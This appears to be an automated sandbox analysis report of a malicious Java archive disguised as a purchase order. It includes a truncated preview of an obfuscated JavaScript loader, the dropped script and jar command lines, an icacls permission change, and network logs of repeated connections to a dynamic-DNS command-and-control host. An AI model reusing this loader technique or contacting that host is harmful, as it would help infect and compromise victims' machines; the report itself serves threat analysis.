                                                                                                                                                                                                                                  Preview:String["prototype"].proc = function() { eval(this.toString());};..String["prototype"]["\x75\x6E\x64\x65\x66\x69\x6E\x65\x64"] = function(xx, xy) {..for(var h=0;h<3;h++){xx[h+3] = xy[h];}..};..String.\u0070\u0072\u006f\u0074\u006f\u0074\u0079\u0070\u0065.\u006D\u006F\u0075\u0073\u0065 = {mp3: function(){var d = "";for(var i=0; i<this.toString().length; i++){d = eval("var cd = this.toString().substr(i, 1);cd;") + d;}return d;}}.mp3;..var \u006D\u0033\u004D\u006F\u0072\u0059\u006B\u0041\u0064 = [null,..("\x43\x72\x65\x61\x74\x65\x4F\x62\x6A\x65\x63\x74"+"txeTdaeR|".mouse()+"|undefined|\x61\x64\x6F\x64\x62\x2E|"+"noitisoP|teSrahC".mouse()).split("|").concat("epyT".mouse(), "nepO".mouse())];..'String["prototype"].oS3Hm = function(){return [].s0fStu;}'.proc();..var exp = /{(\d+)}/g;var oMut1 = null;..Array.prototype.om0l4d3 = function() {var hYiUrF = \u0061\u0072\u0067\u0075\u006D\u0065\u006E\u0074\u0073; return this[0]["replace"](exp, function(k3tTlE0, k3tTlE1) { try{.return hYiUrF[k3tTlE1]

                                                                                                                                                                                                                                  C:\Windows\SysWOW64\test.txt

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (969), with no line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):969
                                                                                                                                                                                                                                  Entropy (8bit):5.6126827800284165
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:fd1yAISXmGd2lbWlUiwhbCbiLKXogYZi2Xp9Rt5ePdwg6:fdcyKbu4JpZdp9RtB
                                                                                                                                                                                                                                  MD5:C37021210D06216FEF238839A93D416E
                                                                                                                                                                                                                                  SHA1:8DA2D29A4AC2FD619C2A471079981678EB1C60CC
                                                                                                                                                                                                                                  SHA-256:79C7AC4D9C950E2439A204167D2F9684CA2B73C8C909FD2755A59D531E1D7E8B
                                                                                                                                                                                                                                  SHA-512:EDA6FC02274D13BE48A69A03DD9DEBB1452F8BF609D09BBBEF80E2B7C505CE56C05A31293128E5977CFFDFDB0EA565550E407707F25C0E9B1878DBBF6D0E3672
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:tMZjchLqaLvveFCCPTLirbjaTbifYVZjqAWsRKNrhMGHnSeHxcPnDhmjAWfVmWNZBWqWKSUajIDMmekKVeKcRmbdWBDwUcRQJlrJbbihjvIMTxmtSRHUJvABMsvEdFwiiUinPkqJGWwYoFPsFARjCKqfuhkkuGmNlYBPSFwYagWGapGPgerawNJKsRmVsaDerEQiUJHCfJbnjNgYXVoIYhTeatHIBCPniwverxdOhHFYpJYpOAfKoMPhlNTOsplfrceeOYrorAnoVaRFOBnnHggadRttpCZsQMKZkVZfQDYOKIBnOpewTJgDHfLULnivnjoqeQhwvoqDVAqocuWcwCvloemMCTubYjruieNArnDsSQJZcnBDCgobZqpuVhFuHBmmRMMFsdAHNMSoEDEtrGWNgChThmOEJhcZGTCFRGYWQdmkdnJrUUkAnYAXXvuTORvDWUWFGJpEEvDuqAwrOHGxwfkmRuSSDLbsfGcHBIhHvuvpohWwtImXCDldSIeqCmSFKQKaIFCbFntijfdYnGtCWfQQCfHHwDguUWODwAkZZJQGRCQePQgKBoQuehPoINjIuginAOiJNLrkpxaBXohALWFlVNkOWLSHvAOqXeDfIpvFRGYvJnbIdZPblSuEucQlTBLbgqEreLnBOCaPbLHMQSEocjYDRpupXQVqjXWXcoPogSpMcjIKQIbMtcDAcvMnUlTtmtrAwFdIbZdsvdJGOVZeOGAYNuKVYYMAJYuIOLUxJSUMSQiPFvPlRkCpvuMCPhAjERDnSNGhvatYkEcTeBDrrjJaHNsnQBFIMmwQXJnXicdUvjnwYoIEuLBovFsNdtKqBfDYfvTMTdxHigJPSspLWZJVkBTVjcKQlNULMecVCGAJhalUSRIplJAkFAYdMfYZIXjnsESFjIecsfxGhkPYfFbwJiurHnawTkdJSsWeudeRTrZrYdoRaJnvDlKkargao

                                                                                                                                                                                                                                  Static File Info

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  File type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                                                                  Entropy (8bit):7.993136790773696
                                                                                                                                                                                                                                  TrID:
                                                                                                                                                                                                                                  • Java Archive (13504/1) 62.80%
                                                                                                                                                                                                                                  • ZIP compressed archive (8000/1) 37.20%
                                                                                                                                                                                                                                  File name:NewOrder - P2D041197.jar
                                                                                                                                                                                                                                  File size:643'693 bytes
                                                                                                                                                                                                                                  MD5:bc34f4e23dca52ed6425b46a3dcf5e95
                                                                                                                                                                                                                                  SHA1:e82affa4fea489146e3deb803efdb561a394073f
                                                                                                                                                                                                                                  SHA256:f77617921c5fb6f8114eca9fe330b8d2bfc3a99c4f581f3f9a8282a31d528aeb
                                                                                                                                                                                                                                  SHA512:2f3a171e9ada6f10b4ed182f5fdb4ec7086f99def55db52f2663980eff2009048b6a240f30c7c9e3ba518b4075c79bc77faa5e613e590f823abc1e613385123a
                                                                                                                                                                                                                                  SSDEEP:12288:Cz396wbsskjH0PljDlBPfPSlU5XhBFDYU1SkzuiSn/BIu9:s39bssOUP1l9fPScXhfg3z
                                                                                                                                                                                                                                  TLSH:D7D423CED8E9EA91B6935C600D34B73AB7D6768D03AB0D70A77C9B1CDEB231500E5582
                                                                                                                                                                                                                                  File Content Preview:PK...........X...4S.........$.yhmfm/resources/mzmobunljo.. .................D.......D.........]..:.-.|.W.._.jT.:.L....<,.E`lD".....@.. 0i.........vu.>...q..... ."f...9...../?O..|..:]~..?........|..|.....O..t......^...o....................-.......c........

                                                                                                                                                                                                                                  File Icon

                                                                                                                                                                                                                                  Icon Hash:d08c8e8ea2868a54

                                                                                                                                                                                                                                  Network Behavior

                                                                                                                                                                                                                                  Network Port Distribution

                                                                                                                                                                                                                                  TCP Packets

                                                                                                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                  Apr 17, 2024 07:02:15.636193037 CEST497395000192.168.2.4103.151.123.225
                                                                                                                                                                                                                                  Apr 17, 2024 07:02:16.049423933 CEST500049739103.151.123.225192.168.2.4
                                                                                                                                                                                                                                  Apr 17, 2024 07:02:16.050196886 CEST497395000192.168.2.4103.151.123.225
                                                                                                                                                                                                                                  Apr 17, 2024 07:02:16.109046936 CEST497395000192.168.2.4103.151.123.225
                                                                                                                                                                                                                                  Apr 17, 2024 07:02:16.527429104 CEST500049739103.151.123.225192.168.2.4
                                                                                                                                                                                                                                  Apr 17, 2024 07:02:16.542557955 CEST500049739103.151.123.225192.168.2.4
                                                                                                                                                                                                                                  Apr 17, 2024 07:02:16.543709040 CEST497395000192.168.2.4103.151.123.225
                                                                                                                                                                                                                                  Apr 17, 2024 07:02:16.548906088 CEST500049739103.151.123.225192.168.2.4
                                                                                                                                                                                                                                  Apr 17, 2024 07:02:16.549423933 CEST500049739103.151.123.225192.168.2.4
                                                                                                                                                                                                                                  Apr 17, 2024 07:02:16.552638054 CEST497395000192.168.2.4103.151.123.225
                                                                                                                                                                                                                                  Apr 17, 2024 07:02:16.554945946 CEST497395000192.168.2.4103.151.123.225
                                                                                                                                                                                                                                  Apr 17, 2024 07:02:16.673475027 CEST500049739103.151.123.225192.168.2.4
                                                                                                                                                                                                                                  Apr 17, 2024 07:02:16.673525095 CEST500049739103.151.123.225192.168.2.4
                                                                                                                                                                                                                                  Apr 17, 2024 07:02:16.673597097 CEST497395000192.168.2.4103.151.123.225
                                                                                                                                                                                                                                  Apr 17, 2024 07:02:16.678056955 CEST497395000192.168.2.4103.151.123.225
                                                                                                                                                                                                                                  Apr 17, 2024 07:02:16.678735971 CEST497395000192.168.2.4103.151.123.225
                                                                                                                                                                                                                                  Apr 17, 2024 07:02:17.023097992 CEST500049739103.151.123.225192.168.2.4
                                                                                                                                                                                                                                  Apr 17, 2024 07:02:17.097986937 CEST500049739103.151.123.225192.168.2.4
                                                                                                                                                                                                                                  Apr 17, 2024 07:02:17.099550962 CEST500049739103.151.123.225192.168.2.4
                                                                                                                                                                                                                                  Apr 17, 2024 07:02:17.099904060 CEST500049739103.151.123.225192.168.2.4
                                                                                                                                                                                                                                  Apr 17, 2024 07:02:17.100953102 CEST497395000192.168.2.4103.151.123.225
                                                                                                                                                                                                                                  Apr 17, 2024 07:02:17.103293896 CEST497395000192.168.2.4103.151.123.225
                                                                                                                                                                                                                                  Apr 17, 2024 07:02:17.103374004 CEST497395000192.168.2.4103.151.123.225
                                                                                                                                                                                                                                  Apr 17, 2024 07:02:17.103682995 CEST497395000192.168.2.4103.151.123.225
                                                                                                                                                                                                                                  Apr 17, 2024 07:02:17.103770018 CEST497395000192.168.2.4103.151.123.225
                                                                                                                                                                                                                                  Apr 17, 2024 07:02:17.103908062 CEST497395000192.168.2.4103.151.123.225
                                                                                                                                                                                                                                  Apr 17, 2024 07:02:17.104089022 CEST497395000192.168.2.4103.151.123.225
                                                                                                                                                                                                                                  Apr 17, 2024 07:02:17.104254007 CEST497395000192.168.2.4103.151.123.225
                                                                                                                                                                                                                                  Apr 17, 2024 07:02:17.530198097 CEST500049739103.151.123.225192.168.2.4
                                                                                                                                                                                                                                  Apr 17, 2024 07:02:17.530237913 CEST500049739103.151.123.225192.168.2.4
                                                                                                                                                                                                                                  Apr 17, 2024 07:02:17.530623913 CEST500049739103.151.123.225192.168.2.4
                                                                                                                                                                                                                                  Apr 17, 2024 07:02:17.581275940 CEST500049739103.151.123.225192.168.2.4
                                                                                                                                                                                                                                  Apr 17, 2024 07:02:17.596632957 CEST500049739103.151.123.225192.168.2.4
                                                                                                                                                                                                                                  Apr 17, 2024 07:02:17.597477913 CEST500049739103.151.123.225192.168.2.4
                                                                                                                                                                                                                                  Apr 17, 2024 07:02:17.597858906 CEST497395000192.168.2.4103.151.123.225
                                                                                                                                                                                                                                  Apr 17, 2024 07:02:17.597994089 CEST500049739103.151.123.225192.168.2.4
                                                                                                                                                                                                                                  Apr 17, 2024 07:02:17.628834009 CEST497395000192.168.2.4103.151.123.225
                                                                                                                                                                                                                                  Apr 17, 2024 07:02:17.642261982 CEST497395000192.168.2.4103.151.123.225
                                                                                                                                                                                                                                  Apr 17, 2024 07:02:18.081355095 CEST500049739103.151.123.225192.168.2.4
                                                                                                                                                                                                                                  Apr 17, 2024 07:02:47.630363941 CEST497395000192.168.2.4103.151.123.225
                                                                                                                                                                                                                                  Apr 17, 2024 07:02:48.097290039 CEST500049739103.151.123.225192.168.2.4
                                                                                                                                                                                                                                  Apr 17, 2024 07:02:57.848912001 CEST497395000192.168.2.4103.151.123.225
                                                                                                                                                                                                                                  Apr 17, 2024 07:02:58.333609104 CEST500049739103.151.123.225192.168.2.4
                                                                                                                                                                                                                                  Apr 17, 2024 07:03:03.075186014 CEST497395000192.168.2.4103.151.123.225
                                                                                                                                                                                                                                  Apr 17, 2024 07:03:03.541843891 CEST500049739103.151.123.225192.168.2.4
                                                                                                                                                                                                                                  Apr 17, 2024 07:03:17.630331039 CEST497395000192.168.2.4103.151.123.225
                                                                                                                                                                                                                                  Apr 17, 2024 07:03:18.082964897 CEST500049739103.151.123.225192.168.2.4
                                                                                                                                                                                                                                  Apr 17, 2024 07:03:43.130146027 CEST497395000192.168.2.4103.151.123.225
                                                                                                                                                                                                                                  Apr 17, 2024 07:03:43.622402906 CEST500049739103.151.123.225192.168.2.4
                                                                                                                                                                                                                                  Apr 17, 2024 07:03:47.645950079 CEST497395000192.168.2.4103.151.123.225
                                                                                                                                                                                                                                  Apr 17, 2024 07:03:48.126580000 CEST500049739103.151.123.225192.168.2.4
                                                                                                                                                                                                                                  Apr 17, 2024 07:03:48.130115032 CEST497395000192.168.2.4103.151.123.225
                                                                                                                                                                                                                                  Apr 17, 2024 07:03:48.619440079 CEST500049739103.151.123.225192.168.2.4

                                                                                                                                                                                                                                  UDP Packets

                                                                                                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                  Apr 17, 2024 07:02:15.524395943 CEST5510553192.168.2.41.1.1.1
                                                                                                                                                                                                                                  Apr 17, 2024 07:02:15.630578041 CEST53551051.1.1.1192.168.2.4

                                                                                                                                                                                                                                  DNS Queries

                                                                                                                                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                  Apr 17, 2024 07:02:15.524395943 CEST192.168.2.41.1.1.10x5124Standard query (0)pnauco5.ddns.netA (IP address)IN (0x0001)false

                                                                                                                                                                                                                                  DNS Answers

                                                                                                                                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                  Apr 17, 2024 07:02:15.630578041 CEST1.1.1.1192.168.2.40x5124No error (0)pnauco5.ddns.net103.151.123.225A (IP address)IN (0x0001)false

                                                                                                                                                                                                                                  Statistics

                                                                                                                                                                                                                                  CPU Usage

                                                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                                                  Memory Usage

                                                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                                                  High Level Behavior Distribution

                                                                                                                                                                                                                                  Click to dive into process behavior distribution

                                                                                                                                                                                                                                  Behavior

                                                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                                                  System Behavior

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:0
                                                                                                                                                                                                                                  Start time:07:01:52
                                                                                                                                                                                                                                  Start date:17/04/2024
                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\Java\jre-1.8\bin\java.exe" -javaagent:"C:\Users\user\AppData\Local\Temp\jartracer.jar" -jar "C:\Users\user\Desktop\NewOrder - P2D041197.jar"" >> C:\cmdlinestart.log 2>&1
                                                                                                                                                                                                                                  Imagebase:0x240000
                                                                                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:1
                                                                                                                                                                                                                                  Start time:07:01:52
                                                                                                                                                                                                                                  Start date:17/04/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:2
                                                                                                                                                                                                                                  Start time:07:01:52
                                                                                                                                                                                                                                  Start date:17/04/2024
                                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Java\jre-1.8\bin\java.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Java\jre-1.8\bin\java.exe" -javaagent:"C:\Users\user\AppData\Local\Temp\jartracer.jar" -jar "C:\Users\user\Desktop\NewOrder - P2D041197.jar"
                                                                                                                                                                                                                                  Imagebase:0x610000
                                                                                                                                                                                                                                  File size:257'664 bytes
                                                                                                                                                                                                                                  MD5 hash:9DAA53BAB2ECB33DC0D9CA51552701FA
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Reputation:moderate
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:3
                                                                                                                                                                                                                                  Start time:07:01:53
                                                                                                                                                                                                                                  Start date:17/04/2024
                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M
                                                                                                                                                                                                                                  Imagebase:0xb80000
                                                                                                                                                                                                                                  File size:29'696 bytes
                                                                                                                                                                                                                                  MD5 hash:2E49585E4E08565F52090B144062F97E
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:4
                                                                                                                                                                                                                                  Start time:07:01:53
                                                                                                                                                                                                                                  Start date:17/04/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:5
                                                                                                                                                                                                                                  Start time:07:01:53
                                                                                                                                                                                                                                  Start date:17/04/2024
                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\wscript.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                  Commandline:wscript C:\Users\user\zbrspjjraf.js
                                                                                                                                                                                                                                  Imagebase:0xad0000
                                                                                                                                                                                                                                  File size:147'456 bytes
                                                                                                                                                                                                                                  MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Reputation:moderate
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:6
                                                                                                                                                                                                                                  Start time:07:01:56
                                                                                                                                                                                                                                  Start date:17/04/2024
                                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe" -jar "C:\Users\user\AppData\Roaming\krmyqqmohp.txt"
                                                                                                                                                                                                                                  Imagebase:0x7c0000
                                                                                                                                                                                                                                  File size:257'664 bytes
                                                                                                                                                                                                                                  MD5 hash:6E0F4F812AE02FBCB744A929E74A04B8
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Reputation:moderate
                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:7
                                                                                                                                                                                                                                  Start time:07:01:56
                                                                                                                                                                                                                                  Start date:17/04/2024
                                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Java\jre-1.8\bin\java.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Java\jre-1.8\bin\java.exe" -jar C:\Users\user\AppData\Local\Temp\_0.337891030941391956323023258775833856.class
                                                                                                                                                                                                                                  Imagebase:0x610000
                                                                                                                                                                                                                                  File size:257'664 bytes
                                                                                                                                                                                                                                  MD5 hash:9DAA53BAB2ECB33DC0D9CA51552701FA
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Reputation:moderate
                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:8
                                                                                                                                                                                                                                  Start time:07:01:56
                                                                                                                                                                                                                                  Start date:17/04/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:9
                                                                                                                                                                                                                                  Start time:07:01:58
                                                                                                                                                                                                                                  Start date:17/04/2024
                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                  Commandline:cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive4614601071766058238.vbs
                                                                                                                                                                                                                                  Imagebase:0x240000
                                                                                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:10
                                                                                                                                                                                                                                  Start time:07:01:58
                                                                                                                                                                                                                                  Start date:17/04/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:11
                                                                                                                                                                                                                                  Start time:07:01:58
                                                                                                                                                                                                                                  Start date:17/04/2024
                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cscript.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                  Commandline:cscript.exe C:\Users\user\AppData\Local\Temp\Retrive4614601071766058238.vbs
                                                                                                                                                                                                                                  Imagebase:0xc90000
                                                                                                                                                                                                                                  File size:144'896 bytes
                                                                                                                                                                                                                                  MD5 hash:CB601B41D4C8074BE8A84AED564A94DC
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Reputation:moderate
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:12
                                                                                                                                                                                                                                  Start time:07:01:58
                                                                                                                                                                                                                                  Start date:17/04/2024
                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                  Commandline:cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive508991219844214216.vbs
                                                                                                                                                                                                                                  Imagebase:0x240000
                                                                                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:13
                                                                                                                                                                                                                                  Start time:07:01:58
                                                                                                                                                                                                                                  Start date:17/04/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:14
                                                                                                                                                                                                                                  Start time:07:01:58
                                                                                                                                                                                                                                  Start date:17/04/2024
                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cscript.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                  Commandline:cscript.exe C:\Users\user\AppData\Local\Temp\Retrive508991219844214216.vbs
                                                                                                                                                                                                                                  Imagebase:0xc90000
                                                                                                                                                                                                                                  File size:144'896 bytes
                                                                                                                                                                                                                                  MD5 hash:CB601B41D4C8074BE8A84AED564A94DC
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:15
                                                                                                                                                                                                                                  Start time:07:01:58
                                                                                                                                                                                                                                  Start date:17/04/2024
                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                  Commandline:cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive4410908985771939559.vbs
                                                                                                                                                                                                                                  Imagebase:0x240000
                                                                                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:16
                                                                                                                                                                                                                                  Start time:07:01:58
                                                                                                                                                                                                                                  Start date:17/04/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:17
                                                                                                                                                                                                                                  Start time:07:01:58
                                                                                                                                                                                                                                  Start date:17/04/2024
                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cscript.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                  Commandline:cscript.exe C:\Users\user\AppData\Local\Temp\Retrive4410908985771939559.vbs
                                                                                                                                                                                                                                  Imagebase:0xc90000
                                                                                                                                                                                                                                  File size:144'896 bytes
                                                                                                                                                                                                                                  MD5 hash:CB601B41D4C8074BE8A84AED564A94DC
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:18
                                                                                                                                                                                                                                  Start time:07:01:58
                                                                                                                                                                                                                                  Start date:17/04/2024
